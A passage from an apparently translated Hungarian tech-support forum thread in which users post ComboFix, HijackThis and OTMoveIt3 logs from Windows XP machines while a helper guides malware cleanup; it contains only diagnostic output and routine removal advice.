HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Component Manager
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LDM
HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MsnMsgr

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"c:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"c:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE"=

R2 ekrn;Eset Service;c:\program files\ESET\ESET Smart Security\ekrn.exe [2008.10.24. 20:51 468224]
.
Contents of the 'Scheduled Tasks' folder

2009-05-30 c:\windows\Tasks\HP Usg Daily.job
- c:\program files\Hewlett-Packard\{D946675D-1D6C-4dc8-9E0D-B4B8EAA30EAA}\pexpress\hphped05.exe [2004-01-07 05:05]
.
- - - - ORPHANS REMOVED - - - -

SafeBoot-procexp90.Sys
MSConfigStartUp-CTFMON - (no file)


.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.wxpee.hu/
uInternet Connection Wizard,ShellNext = hxxp://www.wxpee.hu/
uSearchURL,(Default) = hxxp://www.google.com/keyword/%s
IE: &Google Search - c:\program files\Google\GoogleToolbar1.dll/cmsearch.html
IE: Backward Links - c:\program files\Google\GoogleToolbar1.dll/cmbacklinks.html
IE: Cached Snapshot of Page - c:\program files\Google\GoogleToolbar1.dll/cmcache.html
IE: E&xportálás a Microsoft Excel programba - c:\progra~1\MICROS~1\Office12\EXCEL.EXE/3000
IE: Similar Pages - c:\program files\Google\GoogleToolbar1.dll/cmsimilar.html
IE: Translate into English - c:\program files\Google\GoogleToolbar1.dll/cmtrans.html
DPF: Microsoft XML Parser for Java - file:///C:/WINDOWS/Java/classes/xmldso.cab
FF - ProfilePath - c:\documents and settings\Rendszergazda\Application Data\Mozilla\Firefox\Profiles\w74b2vbb.default\
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava11.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava12.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava13.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava14.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjava32.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npjpi160.dll
FF - plugin: c:\program files\Java\jre1.6.0\bin\npoji610.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npFoxitReaderPlugin.dll
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-05-30 20:41
Windows 5.1.2600 Szervizcsomag 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(764)
c:\windows\system32\sfc_os.dll
.
Completion time: 2009-05-30 20:43
ComboFix-quarantined-files.txt 2009-05-30 18:43

Pre-Run: 5 190 135 808 bájt szabad
Post-Run: 5 226 016 768 bájt szabad

185


Sat May 30, 2009 19:54
the soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, that's why what you see looks like this,
Post
:D
we'll see what combofix shows

Quote:
Download this combofix and put it on the DESKTOP, close everything, and turn off the Spyware Terminator shield, if you have it, and the +SpybotTeaTimer shield too, if you have it. No program may be running. Run it as administrator, in normal Windows - double-click the combofix icon > agree......
And now you will just watch and not fiddle with anything; the machine restarts by itself, finishes the scan, and creates combofix .txt; post that here and
http://download.bleepingcomputer.com/sUBs/ComboFix.exe


Sat May 30, 2009 19:11
platina tag
Avatar

Csatlakozott: szer. márc. 24, 2004 13:43
Hozzászólások: 595
Hozzászólás 
Hi Stell!

Yet another machine on which I am trying to install Final Uninstall from the original exe file, and it never lets me install it; instead ESET Smart Sec screams partway through that is-UQK9M.tmp is a New Heur_PE virus, cleaned by deletion, moved to quarantine. Then after a restart it flagged another tmp file, also as a New Heur_PE virus.

Here is a HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 19:10:31, on 2009.05.30.
Platform: Windows XP Szervizcsomag 3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.20815)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
C:\Program Files\ESET\ESET Smart Security\egui.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ESET\ESET Smart Security\ekrn.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wscntfy.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.wxpee.hu/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.wxpee.hu/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Daytona 2008 FINAL
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hivatkozások
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - (no file)
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET Smart Security\egui.exe" /hide /waitservice
O4 - HKLM\..\Run: [Alternative RunOnceEx by Ruby Software] "C:\WINDOWS\system32\RunOnceEx.exe" /R
O4 - HKLM\..\RunOnce: [Alternative RunOnceEx by Ruby Software] "C:\WINDOWS\system32\RunOnceEx.exe"
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'HELYI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-19\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'HELYI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'HÁLÓZATI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-20\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'HÁLÓZATI SZOLGÁLTATÁS')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [AfterPost] "C:\WINDOWS\afterpost2.cmd" (User 'Default user')
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xportálás a Microsoft Excel programba - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupda ... 3676175593
O17 - HKLM\System\CCS\Services\Tcpip\..\{E2F5D8C7-99B5-4740-942B-200D813F14EB}: NameServer = 84.2.44.1 84.2.46.1
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET Smart Security\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET Smart Security\ekrn.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Logitech Process Monitor (LVPrcSrv) - Logitech Inc. - c:\program files\common files\logitech\lvmvfm\LVPrcSrv.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 5855 bytes

What should I do?


Sat May 30, 2009 18:19
soul of the forum

Joined: Sun Jun 24, 2007 10:18
Posts: 6679
Location: Revuca.S.k>>Slovakia, I can't write Hungarian well, which is why what you see looks like this,
Post
OK, no need to thank me
run the OTMOVEIT program and click Cleanup, then Yes.


Sun May 24, 2009 15:36
silver member

Joined: Thu Jun 21, 2007 10:27
Posts: 92
Post
I managed to fix it! The Administrators had to be given full access to the HKEY_CLASSES_ROOT key. Thanks for the help, the machine is completely fine now!


Sun May 24, 2009 14:49
silver member

Joined: Thu Jun 21, 2007 10:27
Posts: 92
Post
========== PROCESSES ==========
Process explorer.exe killed successfully.
========== FILES ==========
File/Folder C:\WINDOWS\system32\*.tmp.dll not found.
File/Folder C:\WINDOWS\system32\SET*.tmp not found.
C:\WINDOWS\002761_.tmp moved successfully.
C:\WINDOWS\SET21.tmp moved successfully.
C:\WINDOWS\SET22.tmp moved successfully.
C:\WINDOWS\SET23.tmp moved successfully.
C:\WINDOWS\SET24.tmp moved successfully.
C:\WINDOWS\SET25.tmp moved successfully.
C:\WINDOWS\SET26.tmp moved successfully.
C:\WINDOWS\SET27.tmp moved successfully.
C:\WINDOWS\SET28.tmp moved successfully.
C:\WINDOWS\SET29.tmp moved successfully.
C:\WINDOWS\SET2A.tmp moved successfully.
C:\WINDOWS\SET2B.tmp moved successfully.
C:\WINDOWS\SET2C.tmp moved successfully.
C:\WINDOWS\SET2D.tmp moved successfully.
C:\WINDOWS\SET2E.tmp moved successfully.
C:\WINDOWS\SET2F.tmp moved successfully.
C:\WINDOWS\SET3.tmp moved successfully.
C:\WINDOWS\SET30.tmp moved successfully.
C:\WINDOWS\SET31.tmp moved successfully.
C:\WINDOWS\SET32.tmp moved successfully.
C:\WINDOWS\SET33.tmp moved successfully.
C:\WINDOWS\SET34.tmp moved successfully.
C:\WINDOWS\SET35.tmp moved successfully.
C:\WINDOWS\SET36.tmp moved successfully.
C:\WINDOWS\SET37.tmp moved successfully.
C:\WINDOWS\SET38.tmp moved successfully.
C:\WINDOWS\SET39.tmp moved successfully.
C:\WINDOWS\SET3A.tmp moved successfully.
C:\WINDOWS\SET3B.tmp moved successfully.
C:\WINDOWS\SET3C.tmp moved successfully.
C:\WINDOWS\SET3D.tmp moved successfully.
C:\WINDOWS\SET4.tmp moved successfully.
C:\WINDOWS\SET8.tmp moved successfully.
C:\WINDOWS\Internet Logs\xDB1.tmp moved successfully.
C:\WINDOWS\Internet Logs\xDB2.tmp moved successfully.
C:\WINDOWS\Internet Logs\xDB3.tmp moved successfully.
C:\WINDOWS\system32\CONFIG.TMP moved successfully.
C:\WINDOWS\system32\Com\COM3C0.tmp moved successfully.
File move failed. C:\WINDOWS\temp\ZLT0719b.TMP scheduled to be moved on reboot.
C:\WINDOWS\twain_32\hpqgnds2.tmp moved successfully.
File move failed. C:\WINDOWS\system32\h323log.txt scheduled to be moved on reboot.
========== REGISTRY ==========
Registry key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b6711a6f-d644-11dd-b0d3-003005dcafdf}\\ not found.
========== COMMANDS ==========
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\AcrA03.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\JETCAC7.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo386 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo387 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo388 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo389 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo390 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo391 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo392 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo393 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo394 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo395 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo396 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo397 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo398 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo399 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo400 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo401 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo402 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo403 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo404 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo405 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo406 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo407 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo408 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo409 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo410 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo411 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo412 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo413 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo414 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo415 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo416 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo417 scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C3F.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C55.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF677F.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFCFF3.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFD009.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFF81F.tmp scheduled to be deleted on reboot.
File delete failed. C:\DOCUME~1\Bence\LOCALS~1\Temp\~ROMFN_00000F50 scheduled to be deleted on reboot.
User's Temp folder emptied.
User's Internet Explorer cache folder emptied.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
User's Temporary Internet Files folder emptied.
Local Service Temp folder emptied.
File delete failed. C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat scheduled to be deleted on reboot.
Local Service Temporary Internet Files folder emptied.
Network Service Temp folder emptied.
Network Service Temporary Internet Files folder emptied.
File delete failed. C:\WINDOWS\temp\KeyFocusKFWSMMFile.txt scheduled to be deleted on reboot.
File delete failed. C:\WINDOWS\temp\Perflib_Perfdata_7d4.dat scheduled to be deleted on reboot.
File delete failed. C:\WINDOWS\temp\ZLT0719b.TMP scheduled to be deleted on reboot.
Windows Temp folder emptied.
Java cache emptied.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0006\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0005\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0004\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0003\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0002\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\adoc.bx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\md.dat scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\url.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\w.ax scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0001\wb.vx scheduled to be deleted on reboot.
File delete failed. C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\cache4\opr07CG2 scheduled to be deleted on reboot.
Opera cache emptied.
Temp folders emptied.
Explorer started successfully

OTMoveIt3 by OldTimer - Version 1.0.11.0 log created on 05232009_205657

Files moved on Reboot...
File C:\WINDOWS\temp\ZLT0719b.TMP not found!
C:\WINDOWS\system32\h323log.txt moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\AcrA03.tmp not found!
File C:\DOCUME~1\Bence\LOCALS~1\Temp\JETCAC7.tmp not found!
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo386 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo387 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo388 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo389 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo390 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo391 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo392 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo393 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo394 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo395 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo396 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo397 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo398 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo399 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo400 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo401 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo402 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo403 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo404 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo405 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo406 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo407 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo408 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo409 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo410 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo411 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo412 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo413 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo414 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo415 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo416 moved successfully.
C:\DOCUME~1\Bence\LOCALS~1\Temp\lilo417 moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C3F.tmp not found!
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF2C55.tmp not found!
C:\DOCUME~1\Bence\LOCALS~1\Temp\~DF677F.tmp moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFCFF3.tmp not found!
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFD009.tmp not found!
C:\DOCUME~1\Bence\LOCALS~1\Temp\~DFF81F.tmp moved successfully.
File C:\DOCUME~1\Bence\LOCALS~1\Temp\~ROMFN_00000F50 not found!
C:\WINDOWS\temp\KeyFocusKFWSMMFile.txt moved successfully.
File C:\WINDOWS\temp\Perflib_Perfdata_7d4.dat not found!
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\md.dat moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\url.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\w.ax moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0008\wb.vx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\adoc.bx moved successfully.
C:\Documents and Settings\Bence\Local Settings\Application Data\Opera\Opera\Profile\vps\0007\md.dat moved successfully.
